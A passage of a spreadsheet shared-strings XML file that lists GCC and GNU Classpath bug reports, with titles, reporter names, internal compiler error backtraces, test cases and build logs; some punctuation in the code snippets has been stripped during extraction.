        ret
The first assembly takes 13 cycles the second just 7. I don't see any reason why the second assembly wouldn't work for size 12.</t>
  </si>
  <si>
    <t>ambrop7</t>
  </si>
  <si>
    <t>GCC-68851</t>
  </si>
  <si>
    <t>[6 Regression] ICE:  in set_comdat_group at ipa-comdats.c:213</t>
  </si>
  <si>
    <t>Trying to build Chromium shows:
../../third_party/WebKit/Source/platform/Timer.h:55:13: internal compiler error: in set_comdat_group at ipa-comdats.c:213
     {
             ^    
0x13ad12a set_comdat_group(symtab_node* void*)
        ../../gcc/gcc/ipa-comdats.c:213
0x916795 cgraph_node::call_for_symbol_thunks_and_aliases(bool (*)(cgraph_node* void*) void* bool bool)
        ../../gcc/gcc/cgraph.c:2217
0x916820 cgraph_node::call_for_symbol_thunks_and_aliases(bool (*)(cgraph_node* void*) void* bool bool)
        ../../gcc/gcc/cgraph.c:2235
0x13ae5cb ipa_comdats
        ../../gcc/gcc/ipa-comdats.c:368
0x13ae5cb execute
        ../../gcc/gcc/ipa-comdats.c:412
Reducing.</t>
  </si>
  <si>
    <t>GCC-2679</t>
  </si>
  <si>
    <t>The compiler gives a Segmentation Fault when debug option is passed (-g)</t>
  </si>
  <si>
    <t>Reading specs from /usr/local/bin/../lib/gcc-lib/i386-pc-linux-gnu/3.0/specs
Configured with: ../configure --prefix=/tmp/gcc-20010427-root/usr/local --enable-shared --enable-threads --disable-checking i386-pc-linux-gnu
Thread model: posix
gcc version 3.0 20010427 (prerelease)
 /usr/local/bin/../lib/gcc-lib/i386-pc-linux-gnu/3.0/cpp0 -lang-c++ -D_GNU_SOURCE -D__GNUG__=3 -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -v -I ../../include/ -iprefix /usr/local/bin/../lib/gcc-lib/i386-pc-linux-gnu/3.0/ -D__GNUC__=3 -D__GNUC_MINOR__=0 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__STDC_HOSTED__=1 -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i386__ test-tree.cc test-tree.ii
GNU CPP version 3.0 20010427 (prerelease) (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /tmp/gcc-20010427-root/usr/local/lib/gcc-lib/i386-pc-linux-gnu/3.0/../../../../include/g++-v3
ignoring nonexistent directory /tmp/gcc-20010427-root/usr/local/lib/gcc-lib/i386-pc-linux-gnu/3.0/../../../../include/g++-v3/i386-pc-linux-gnu
ignoring nonexistent directory /tmp/gcc-20010427-root/usr/local/lib/gcc-lib/i386-pc-linux-gnu/3.0/include
ignoring nonexistent directory /tmp/gcc-20010427-root/usr/local/lib/gcc-lib/i386-pc-linux-gnu/3.0/../../../../i386-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 ../../include
 /usr/local/include/g++-v3
 /usr/local/include/g++-v3/i386-pc-linux-gnu
 /usr/local/lib/gcc-lib/i386-pc-linux-gnu/3.0/include
 /usr/local/i386-pc-linux-gnu/include
 /usr/local/include
 /usr/include
End of search list.
 /usr/local/bin/../lib/gcc-lib/i386-pc-linux-gnu/3.0/cc1plus -fpreprocessed test-tree.ii -quiet -dumpbase test-tree.cc -g -version -o test-tree.s
GNU CPP version 3.0 20010427 (prerelease) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.0 20010427 (prerelease) (i386-pc-linux-gnu)
        compiled by GNU C version 3.0 20010427 (prerelease).
In file included from ../../include/mpcl/alloc_smart_pointer.hh:29
                 from ../../include/mpcl/general_tree.hh:35
                 from test-tree.cc:27:
../../include/mpcl/smart_pointer.hh:545: Internal error: Segmentation fault
Please submit a full bug report with preprocessed source if appropriate.
See  for instructions.
[rafa@mastermind tests]$ gcc -v
Reading specs from /usr/local/bin/../lib/gcc-lib/i386-pc-linux-gnu/3.0/specs
Configured with: ../configure --prefix=/tmp/gcc-20010427-root/usr/local --enable-shared --enable-threads --disable-checking i386-pc-linux-gnu
Thread model: posix
gcc version 3.0 20010427 (prerelease)
Release:
gcc version 3.0 20010427 (prerelease)
Environment:
Linux 2.4.2-0.1.19 i586</t>
  </si>
  <si>
    <t>CLASSPATH-22567</t>
  </si>
  <si>
    <t>JCheckBox's check box is missing</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Compile and run the attached testcase.
Expected results:
1. A window with a check box and text1 shows up.
Actual results:
1. A window with text1 shows up. No check box is visible.
Testcase:
import java.awt.*
import javax.swing.*
public class testcase extends JFrame {
        public static void main(String[] args) {
                new testcase().show()
        }
        public testcase() {
                JCheckBox checkbox = new JCheckBox(text1  true)
                setContentPane(checkbox)
                setSize(new Dimension(300 300))
        }
}
The check box is visible with gnu classpath cvs 2005-07-15T11:38:00+0000 but
missing with gnu classpath cvs 2005-07-15T11:45:00+0000. Diff between these
versions shows the following changelog entry:
+2005-07-15  Roman Kennke  
+
+       * javax/swing/AbstractButton.java
+       (AbstractButton): Directly call init() and updateUI().
+       (AbstractButton(String Icon)): Removed. This is not necessary
+       since we have init(String Icon) for that purpose.
+       (getActionCommand): Reverted to previous behaviour: If
+       actionCommand is set return this otherwise return text even
+       if text is null.
+       * javax/swing/JButton.java
+       (JButton(String Icon)): Call super() and init(String Icon)
+       instead of super(String Icon).
+       * javax/swing/JMenuItem.java
+       (JMenuItem): Call super() instead of super(String Icon).
+       (JMenuItem(Icon)): Call this(String Icon) instead of
+       super(String Icon).
+       (JMenuItem(String)): Call this(String Icon) instead of
+       super(String Icon).
+       (JMenuItem(Action)): Call super() instead of
+       super(String Icon).
+       (JMenuItem(String Icon)): Call super() and init(String Icon)
+       instead of super(String Icon).
+       (JMenuItem(String int)): Call this(String Icon) instead of
+       super(String Icon).
+       * javax/swing/JToggleButton.java
+       (ToggleButtonModel.setPressed): Fire an ActionEvent if button
+       is released. According to my Mauve tests it seems that this
+       is what the JDK does so do we.
+       (ToggleButtonModel.setSelected): Removed.
+       (JToggleButton): Call super() and init(String Icon) instead
+       of super(String Icon).
+</t>
  </si>
  <si>
    <t>timo.lindfors</t>
  </si>
  <si>
    <t>GCC-18718</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE: Segmentation fault in in schedule_region (rgn=0) at sched-rgn.c:2325</t>
  </si>
  <si>
    <t>I compiled ACE 5.4.2 with the actual snapshot and got a segfault.
GCC was compiled with CFLAGS=-pipe -g -O3 -mcpu=G5 -maltivec -mabi=altivec -
fmessage-length=0 -falign-loops=16 -falign-jumps=16 -falign-functions=32 -
fstrict-aliasing -fsched-interblock -ffast-math -funroll-all-loops -funit-at-a-
time -fpeel-loops -ftracer -funswitch-loops -floop-optimize2 -fmove-loop-
invariants -fgcse-after-reload -frename-registers -fmodulo-sched --param max-
gcse-passes=5 --param max-unrolled-insns=600 --param inline-unit-growth=300 --
param large-function-growth=400
Michael Cieslinski
g++40 -pipe -O2 -funroll-all-loops -ftracer -c -o SAXPrint_Handler.o 
SAXPrint_Handler.ii -v
Reading specs from /usr/local/gcc40b/lib/gcc/powerpc-unknown-linux-
gnu/4.0.0/specs
Configured with: ../gcc40/configure --prefix=/usr/local/gcc40b --program-
suffix=40b --with-cpu=G5 --enable-altivec --enable-languages=cc++ --enable-
checking
Thread model: posix
gcc version 4.0.0 20041128 (experimental)
 /usr/local/gcc40b/libexec/gcc/powerpc-unknown-linux-gnu/4.0.0/cc1plus -
fpreprocessed SAXPrint_Handler.ii -quiet -dumpbase SAXPrint_Handler.ii -
mcpu=G5 -auxbase-strip SAXPrint_Handler.o -O2 -version -funroll-all-loops -
ftracer -o - |
 as -mpower4 -maltivec -many -V -Qy -o SAXPrint_Handler.o -
GNU assembler version 2.15.90 (ppc-redhat-linux) using BFD version 2.15.90 
20040225
GNU C++ version 4.0.0 20041128 (experimental) (powerpc-unknown-linux-gnu)
        compiled by GNU C version 4.0.0 20041128 (experimental).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
SAXPrint_Handler.cpp: In member function 'void 
ACEXML_SAXPrint_Handler::print_indent()':
SAXPrint_Handler.cpp:244: internal compiler error: Segmentation fault
Please submit a full bug report with preprocessed source if appropriate.
Running cc1plus in GDB:
Program received signal SIGSEGV Segmentation fault.
0x105218b0 in schedule_region (rgn=0) at ../../gcc40/gcc/sched-rgn.c:2325
2325              for (note = REG_NOTES (head) note note = XEXP (note 1))
(gdb) bt
#0  0x105218b0 in schedule_region (rgn=0) at ../../gcc40/gcc/sched-rgn.c:2325
#1  0x105236fc in schedule_insns (dump_file=Variable dump_file is not 
available.
) at ../../gcc40/gcc/sched-rgn.c:2493
#2  0x1046dac4 in rest_of_compilation () at ../../gcc40/gcc/passes.c:651
#3  0x1018460c in execute_pass_list (pass=0x106fce80) at ../../gcc40/gcc/tree-
optimize.c:511
#4  0x101849f8 in tree_rest_of_compilation (fndecl=0x30b99000) 
at ../../gcc40/gcc/tree-optimize.c:647
#5  0x100f72fc in expand_body (fn=0x30b99000) 
at ../../gcc40/gcc/cp/semantics.c:2895
#6  0x104995e0 in cgraph_expand_function (node=0x30ba8200) 
at ../../gcc40/gcc/cgraphunit.c:822
#7  0x1049a684 in cgraph_optimize () at ../../gcc40/gcc/cgraphunit.c:1689
#8  0x10092af0 in cp_finish_file () at ../../gcc40/gcc/cp/decl2.c:3070
#9  0x100017a0 in finish_file () at ../../gcc40/gcc/cp/cp-lang.c:113
#10 0x101547f4 in c_common_parse_file (set_yydebug=Variable set_yydebug is 
not available.
) at ../../gcc40/gcc/c-opts.c:1093
#11 0x1043a4f8 in toplev_main (argc=Variable argc is not available.
) at ../../gcc40/gcc/toplev.c:992
#12 0x10160be0 in main (argc=Variable argc is not available.
) at ../../gcc40/gcc/main.c:35</t>
  </si>
  <si>
    <t>GCC-22358</t>
  </si>
  <si>
    <t>C++ front-end produces mis-match types in MODIFY_EXPR</t>
  </si>
  <si>
    <t>Take the following C++ code:
struct a
{
  virtual ~a()
}
struct b : virtual a { }
b a11
With the (to be) attached patch I get the following mis-match types:
t.cc: In constructor 'b::b()':
t.cc:10: error: statement types mismatch
iftmp.8D.1929 = 0
intD.2
long unsigned intD.7
This was reduced from complex_io.cc in libstdc++.</t>
  </si>
  <si>
    <t>GCC-27155</t>
  </si>
  <si>
    <t>Transfer of character to integer array and vice versa still doesn't work</t>
  </si>
  <si>
    <t>Before when transferring integer arrays to character strings and vice versa you got a message stating this wasn't implemented yet. No the compiler mangles it but produces wrong results.
e.g.:
CHARACTER(8) :: s1 s2
INTEGER(2)   :: ia
s1 = 'ABCDEFGH'
ia = TRANSFER(s1 (/ 0 /))
! On my system ia now is (/1145258561 0/)
s2 = TRANSFER(ia s2)
! Now s2 is 'ABCD'
See attached code</t>
  </si>
  <si>
    <t>bo.berggren</t>
  </si>
  <si>
    <t>GCC-591</t>
  </si>
  <si>
    <t>Internal error on 'void m( void C::a()'</t>
  </si>
  <si>
    <t>Compiler says:
 $ g++ test.cc
  test.cc:6: parse error at end of input
  test.cc:6: Internal error #19990916.
  test.cc:6: Internal compiler error in poplevel at ../gcc/cp/decl.c:
  1302
  Please submit a full bug report. (...)
Release:
2.96 CVS 20010128
Environment:
OS/CPU: Linux 2.2.16-3 i586
How-To-Repeat:
Here is the code in test.cc:
  class C {
  }
  void m(
  void C::a()</t>
  </si>
  <si>
    <t>GCC-65473</t>
  </si>
  <si>
    <t>Including  does not define __GLIBCXX__</t>
  </si>
  <si>
    <t>Hi
One would expect that including _any_ header from the standard library defines the relevant detection macros. For example I usually include the  header to check for libc++ (per http://goo.gl/eXNYJH). However libstdc++'s headers do not always define those detection macros.
Regards
Louis Dionne</t>
  </si>
  <si>
    <t>GCC-1413</t>
  </si>
  <si>
    <t>Internal compiler error in expand_end_case</t>
  </si>
  <si>
    <t>Tds.java:1139: Internal compiler error in expand_end_case at stmt.c:5265
I have to compile other files before I can get error:
[pj@ssl freetds_jdbc]$ make
gcj -c  -O -d .   Logger.java
gcj -c  -O -d .   HexDump.java
gcj -c  -O -d .   DriverVersion.java
gcj -c  -O -d .   TdsUtil.java
gcj -c  -O -d .   TdsException.java
gcj -c  -O -d .   TdsConfused.java
gcj -c  -O -d .   TdsNotImplemented.java
gcj -c  -O -d .   TdsUnknownPacketSubType.java
gcj -c  -O -d .   TdsUnknownPacketType.java
gcj -c  -O -d .   UniqueId.java
gcj -c  -O -d .   TdsAsciiInputStream.java
gcj -c  -O -d .   EscapeProcessor.java
gcj -c  -O -d .   MSSqlServerEscapeProcessor.java
gcj -c  -O -d .   SybaseEscapeProcessor.java
gcj -c  -O -d .   Column.java
gcj -c  -O -d .   Columns.java
gcj -c  -O -d .   ParameterListItem.java
gcj -c  -O -d .   SqlMessage.java
gcj -c  -O -d .   PacketResult.java
gcj -c  -O -d .   PacketMsgResult.java
gcj -c  -O -d .   PacketErrorResult.java
gcj -c  -O -d .   SQLWarningChain.java
gcj -c  -O -d .   EncodingHelper.java
gcj -c  -O -d .   TdsDefinitions.java
gcj -c  -O -d .   TdsComm.java
gcj -c  -O -d .   CancelController.java
gcj -c  -O -d .   PacketUnknown.java
gcj -c  -O -d .   PacketRetStatResult.java
gcj -c  -O -d .   PacketEndTokenResult.java
gcj -c  -O -d .   PacketDoneInProcResult.java
gcj -c  -O -d .   PacketTabNameResult.java
gcj -c  -O -d .   PacketColumnNamesResult.java
gcj -c  -O -d .   PacketColumnInfoResult.java
gcj -c  -O -d .   PacketColumnOrderResult.java
gcj -c  -O -d .   PacketRowResult.java
gcj -c  -O -d .   PacketControlResult.java
gcj -c  -O -d .   Context.java
gcj -c  -O -d .   Tds.java
Tds.java: In class `com.internetcds.jdbc.tds.Tds':
Tds.java: In method `processEnvChange()':
Tds.java:1139: Internal compiler error in expand_end_case at stmt.c:5265
Please submit a full bug report.
See  for instructions.
make: *** [com/internetcds/jdbc/tds/Tds.class] Error 1
You can get Nov 24 freetds_jdbc.snapshot.tgz from
ftp://freetds.internetcds.com/pub/freetds_jdbc
diff -c Makefile Makefile.orig 
*** Makefile    Mon Dec 11 17:02:49 2000
--- Makefile.orig       Mon Dec 11 16:51:40 2000
***************
*** 1118 ****
  # CLASSPATH=.c:/jdk1.2.2/lib/classes.zip
  # CLASSPATH=.:/usr/local/share/java/lib/classes.java
  # CLASSPATH=.c:/jdk1.1.8/lib/classes.zip
! # CLASSPATH=/usr/local/jdk1.1.8/lib/classes.zip:.
!  CLASSPATH=.
  # RUNPATH=%CLASSPATH%.\freetds_jdbc.jar.\unittests.
  RUNPATH=$$CLASSPATH:`pwd`/freetds_jdbc.jar:./unittests:.
--- 1118 ----
  # CLASSPATH=.c:/jdk1.2.2/lib/classes.zip
  # CLASSPATH=.:/usr/local/share/java/lib/classes.java
  # CLASSPATH=.c:/jdk1.1.8/lib/classes.zip
! CLASSPATH=/usr/local/jdk1.1.8/lib/classes.zip:.
! # CLASSPATH=.
  # RUNPATH=%CLASSPATH%.\freetds_jdbc.jar.\unittests.
  RUNPATH=$$CLASSPATH:`pwd`/freetds_jdbc.jar:./unittests:.
***************
*** 2036 ****
  # JAVAC = c:\\jdk1.2.2\\bin\\javac
! JAVAC = gcj -c 
! JFLAGS += -O -d .
! #JFLAGS += -classpath $(CLASSPATH)
  # JAVAC=jikes
  # JIKESPATH=.c:\jdk1.1.8\lib\classes.zip
  # JFLAGS += +D +E -g -d .
! #JDBC_VER=1_0
!  JDBC_VER=2_0
  # JAR = c:\\jdk1.2.2\\bin\\jar
--- 2036 ----
  # JAVAC = c:\\jdk1.2.2\\bin\\javac
! JAVAC = javac
! JFLAGS += -g -d .
! JFLAGS += -classpath $(CLASSPATH)
  # JAVAC=jikes
  # JIKESPATH=.c:\jdk1.1.8\lib\classes.zip
  # JFLAGS += +D +E -g -d .
! JDBC_VER=1_0
! # JDBC_VER=2_0
  # JAR = c:\\jdk1.2.2\\bin\\jar
Pleas ask if you like to get more information
Release:
RH7
Environment:
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/libgcj.spec
rename spec lib to liborig
rename spec startfile to startfileorig
gcc version 2.96 20000731 (Red Hat Linux 7.0)</t>
  </si>
  <si>
    <t>jarvelai</t>
  </si>
  <si>
    <t>GCC-32632</t>
  </si>
  <si>
    <t>-pie won't override -shared in -shared -pie</t>
  </si>
  <si>
    <t>bash-3.2$ cat x.c
#include 
int
main ()
{
  printf (Hello\n)
  return 0
}
bash-3.2$ gcc -pie x.c -fpie
bash-3.2$ ./a.out 
Hello
bash-3.2$ gcc -shared  -pie x.c -fpie
bash-3.2$ ./a.out 
bash: ./a.out: /lib/ld64.so.1: bad ELF interpreter: No such file or directory
bash-3.2$ 
I am expecting -pie will override -shared.</t>
  </si>
  <si>
    <t>GCC-61497</t>
  </si>
  <si>
    <t>[5 regression] Many Go tests FAIL with fatal error: all goroutines are asleep - deadlock!</t>
  </si>
  <si>
    <t>Since this patch
The first bad revision is:
changeset:   14850:db4fd4f0c230
user:        ian@138bc75d-0d04-0410-961f-82ee72b054a4
date:        Fri Jun 06 22:37:27 2014 +0000
summary:     libgo: Merge to master revision 19184.
many 64-bit Go tests FAIL on Solaris 11/x86 (no Solaris 10 results yet) with
FAIL: go.go-torture/execute/chan-1.go execution  -O0
fatal error: all goroutines are asleep - deadlock!
goroutine 16 [chan send]:
created by main
        /vol/gcc/src/hg/trunk/local/libgo/runtime/go-main.c:42
I haven't yet started investigating in more detail.
  Rainer</t>
  </si>
  <si>
    <t>GCC-81097</t>
  </si>
  <si>
    <t>UBSAN: false positive for not existing negation operator and a bogus message</t>
  </si>
  <si>
    <t>gcc rev249202.
Test case doesn't contain negations but ubsan claims that negation has a problem.
Error message also contains reference to '' type. Though problems seem to be related.
&gt; cat f.cpp
unsigned int a = 3309568
unsigned int b = -1204857327
short c = -10871
short x
int main() {
  x = (short(~a) | ~c) +  (short(~b) | ~c)
  return 0
}
&gt; g++ -fsanitize=undefined -O0 f.cpp -o out
&gt; ./out
f.cpp:6:18: runtime error: negation of -32768 cannot be represented in type '' cast to an unsigned type to negate this value to itself</t>
  </si>
  <si>
    <t>GCC-51582</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE when using a class with a matrix of complex numbers in C++0x mode</t>
  </si>
  <si>
    <t>Created attachment 26112
Preprocessed source
Compiling the following code:
#include 
struct Mat {
        std::complex data[3][3]
}
int main() {
        Mat m
}
with -std=c++0x fails giving the following error message:
mat.cpp: In function â€˜int main()â€™:
mat.cpp:17:6:   in constexpr expansion of â€˜m.Mat::Mat()â€™
mat.cpp:17:6: internal compiler error: in build_special_member_call at cp/call.c:6615
However the code compiles successfully when using a vector instead of
a matrix or by removing Mat m.</t>
  </si>
  <si>
    <t>mjdcc</t>
  </si>
  <si>
    <t>GCC-878</t>
  </si>
  <si>
    <t>g++ fails to create multi-dimensional arrays of const objects.</t>
  </si>
  <si>
    <t>Creates multi dimensional array of non const objects but
fails when objects are const.
bug.cpp:30: conversion from `const classA_c[3]' to non-scalar type `classA_c' requested
bug.cpp:30: conversion from `const classA_c[3]' to non-scalar type `classA_c' requested
bug.cpp:30: conversion from `const classA_c[3]' to non-scalar type `classA_c' requested
Release:
gcc version 2.95.2 19991024 (release)
Environment:
sparc-sun-solaris2.7
How-To-Repeat:
g++ bug.cpp</t>
  </si>
  <si>
    <t>GCC-38636</t>
  </si>
  <si>
    <t>[4.2/4.3 regression] ICE with broken ctor declaration</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 4.0.0:
========================================
struct A
A::A(
struct B
========================================
bug.cc:5: internal compiler error: in push_class_level_binding at cp/name-lookup.c:2756
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-83126</t>
  </si>
  <si>
    <t>[8 Regression] ICE in transform_to_exit_first_loop_alt at tree-parloops.c:1713</t>
  </si>
  <si>
    <t>gcc-8.0.0-alpha20171119 snapshot (r254939) ICEs when compiling the following snippet w/ -O1 -ftree-parallelize-loops=2 -floop-parallelize-all:
void
ew (unsigned short int c9)
{
  int e1
  for ()
    {
      unsigned int *by = 
      int *fd
      *fd = c9
      fd = *fd
      if (*fd != 0)
        for (*by = 0 *by &lt; 2 ++*by)
          c9 *= e1
    }
}
% gcc-8.0.0-alpha20171119 -O1 -ftree-parallelize-loops=2 -floop-parallelize-all -w -c dbuks5p2.c
during GIMPLE pass: parloops
dbuks5p2.c: In function 'ew':
dbuks5p2.c:2:1: internal compiler error: in transform_to_exit_first_loop_alt at tree-parloops.c:1713
 ew (unsigned short int c9)
 ^~
0xcf558a transform_to_exit_first_loop_alt
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171119/work/gcc-8-20171119/gcc/tree-parloops.c:1711
0xcf5eac try_transform_to_exit_first_loop_alt
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171119/work/gcc-8-20171119/gcc/tree-parloops.c:1835
0xcf7d45 gen_parallel_loop
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171119/work/gcc-8-20171119/gcc/tree-parloops.c:2379
0xcf826c parallelize_loops
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171119/work/gcc-8-20171119/gcc/tree-parloops.c:3366
0xcf852f execute
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171119/work/gcc-8-20171119/gcc/tree-parloops.c:3448</t>
  </si>
  <si>
    <t>GCC-19362</t>
  </si>
  <si>
    <t>ICE in fold_convert at fold-const.c:1998</t>
  </si>
  <si>
    <t>MODULE M
        TYPE T0
          SEQUENCE
          INTEGER I
        END TYPE
      END
      PROGRAM MAIN
        USE M T1 =&gt; T0
        TYPE T0
          SEQUENCE
          INTEGER I
        END TYPE
        TYPE(T0) :: BAR
        TYPE(T1) :: BAZ
        BAZ = BAR
      END
Fails to compile with ICE on i686-linux with gfortran version 4.0.0 20050110
(experimental).</t>
  </si>
  <si>
    <t>GCC-56347</t>
  </si>
  <si>
    <t>[4.8 Regression] FAIL: gfortran.dg/integer_exponentiation_2.f90  -O2  execution test</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/testsuite/gfortran/../../gfortran -B
/test/gnu/gcc/objdir/gcc/testsuite/gfortran/../../ -B/test/gnu/gcc/objdir/hppa2.
0w-hp-hpux11.11/./libgfortran/ /test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/integ
er_exponentiation_2.f90  -fno-diagnostics-show-caret   -O2    -B/test/gnu/gcc/ob
jdir/hppa2.0w-hp-hpux11.11/./libgfortran/.libs -L/test/gnu/gcc/objdir/hppa2.0w-h
p-hpux11.11/./libgfortran/.libs -L/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./l
ibgfortran/.libs -B/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libquadmath/.lib
s -L/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libquadmath/.libs -L/test/gnu/g
cc/objdir/hppa2.0w-hp-hpux11.11/./libquadmath/.libs  -lm   -o ./integer_exponent
iation_2.exe    (timeout = 300)
spawn /test/gnu/gcc/objdir/gcc/testsuite/gfortran/../../gfortran -B/test/gnu/gcc
/objdir/gcc/testsuite/gfortran/../../ -B/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.
11/./libgfortran/ /test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/integer_exponentia
tion_2.f90 -fno-diagnostics-show-caret -O2 -B/test/gnu/gcc/objdir/hppa2.0w-hp-hp
ux11.11/./libgfortran/.libs -L/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libgfortran/.libs -L/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libgfortran/.libs -B/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libquadmath/.libs -L/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libquadmath/.libs -L/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libquadmath/.libs -lm -o ./integer_exponentiation_2.exe
/test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/integer_exponentiation_2.f90:142.13:
  call gee_i(i**0_8) ! { dg-warning Type mismatch in argument }
             1
Warning: Type mismatch in argument 'i' at (1) passed INTEGER(8) to INTEGER(4)
/test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/integer_exponentiation_2.f90:143.13:
  call gee_i(i**1_8) ! { dg-warning Type mismatch in argument }
             1
Warning: Type mismatch in argument 'i' at (1) passed INTEGER(8) to INTEGER(4)
/test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/integer_exponentiation_2.f90:144.13:
  call gee_i(i**2_8) ! { dg-warning Type mismatch in argument }
             1
Warning: Type mismatch in argument 'i' at (1) passed INTEGER(8) to INTEGER(4)
/test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/integer_exponentiation_2.f90:145.13:
  call gee_i(i**3_8) ! { dg-warning Type mismatch in argument }
             1
Warning: Type mismatch in argument 'i' at (1) passed INTEGER(8) to INTEGER(4)
/test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/integer_exponentiation_2.f90:146.13:
  call gee_i(i**(-1_8)) ! { dg-warning Type mismatch in argument }
             1
Warning: Type mismatch in argument 'i' at (1) passed INTEGER(8) to INTEGER(4)
/test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/integer_exponentiation_2.f90:147.13:
  call gee_i(i**(-2_8)) ! { dg-warning Type mismatch in argument }
             1
Warning: Type mismatch in argument 'i' at (1) passed INTEGER(8) to INTEGER(4)
/test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/integer_exponentiation_2.f90:148.13:
  call gee_i(i**(-3_8)) ! { dg-warning Type mismatch in argument }
             1
Warning: Type mismatch in argument 'i' at (1) passed INTEGER(8) to INTEGER(4)
/test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/integer_exponentiation_2.f90:149.13:
  call gee_i(i**huge(0_8)) ! { dg-warning Type mismatch in argument }
             1
Warning: Type mismatch in argument 'i' at (1) passed INTEGER(8) to INTEGER(4)
/test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/integer_exponentiation_2.f90:150.13:
  call gee_i(i**(-huge(0_8))) ! { dg-warning Type mismatch in argument }
             1
Warning: Type mismatch in argument 'i' at (1) passed INTEGER(8) to INTEGER(4)
/test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/integer_exponentiation_2.f90:151.13:
  call gee_i(i**(-huge(0_8)-1_8)) ! { dg-warning Type mismatch in argument }
             1
Warning: Type mismatch in argument 'i' at (1) passed INTEGER(8) to INTEGER(4)
output is:
/test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/integer_exponentiation_2.f90:142.13:
  call gee_i(i**0_8) ! { dg-warning Type mismatch in argument }
             1
Warning: Type mismatch in argument 'i' at (1) passed INTEGER(8) to INTEGER(4)
/test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/integer_exponentiation_2.f90:143.13:
  call gee_i(i**1_8) ! { dg-warning Type mismatch in argument }
             1
Warning: Type mismatch in argument 'i' at (1) passed INTEGER(8) to INTEGER(4)
/test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/integer_exponentiation_2.f90:144.13:
  call gee_i(i**2_8) ! { dg-warning Type mismatch in argument }
             1
Warning: Type mismatch in argument 'i' at (1) passed INTEGER(8) to INTEGER(4)
/test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/integer_exponentiation_2.f90:145.13:
  call gee_i(i**3_8) ! { dg-warning Type mismatch in argument }
             1
Warning: Type mismatch in argument 'i' at (1) passed INTEGER(8) to INTEGER(4)
/test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/integer_exponentiation_2.f90:146.13:
  call gee_i(i**(-1_8)) ! { dg-warning Type mismatch in argument }
             1
Warning: Type mismatch in argument 'i' at (1) passed INTEGER(8) to INTEGER(4)
/test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/integer_exponentiation_2.f90:147.13:
  call gee_i(i**(-2_8)) ! { dg-warning Type mismatch in argument }
             1
Warning: Type mismatch in argument 'i' at (1) passed INTEGER(8) to INTEGER(4)
/test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/integer_exponentiation_2.f90:148.13:
  call gee_i(i**(-3_8)) ! { dg-warning Type mismatch in argument }
             1
Warning: Type mismatch in argument 'i' at (1) passed INTEGER(8) to INTEGER(4)
/test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/integer_exponentiation_2.f90:149.13:
  call gee_i(i**huge(0_8)) ! { dg-warning Type mismatch in argument }
             1
Warning: Type mismatch in argument 'i' at (1) passed INTEGER(8) to INTEGER(4)
/test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/integer_exponentiation_2.f90:150.13:
  call gee_i(i**(-huge(0_8))) ! { dg-warning Type mismatch in argument }
             1
Warning: Type mismatch in argument 'i' at (1) passed INTEGER(8) to INTEGER(4)
/test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/integer_exponentiation_2.f90:151.13:
  call gee_i(i**(-huge(0_8)-1_8)) ! { dg-warning Type mismatch in argument }
             1
Warning: Type mismatch in argument 'i' at (1) passed INTEGER(8) to INTEGER(4)
PASS: gfortran.dg/integer_exponentiation_2.f90  -O2   (test for warnings line 142)
PASS: gfortran.dg/integer_exponentiation_2.f90  -O2   (test for warnings line 143)
PASS: gfortran.dg/integer_exponentiation_2.f90  -O2   (test for warnings line 144)
PASS: gfortran.dg/integer_exponentiation_2.f90  -O2   (test for warnings line 145)
PASS: gfortran.dg/integer_exponentiation_2.f90  -O2   (test for warnings line 146)
PASS: gfortran.dg/integer_exponentiation_2.f90  -O2   (test for warnings line 147)
PASS: gfortran.dg/integer_exponentiation_2.f90  -O2   (test for warnings line 148)
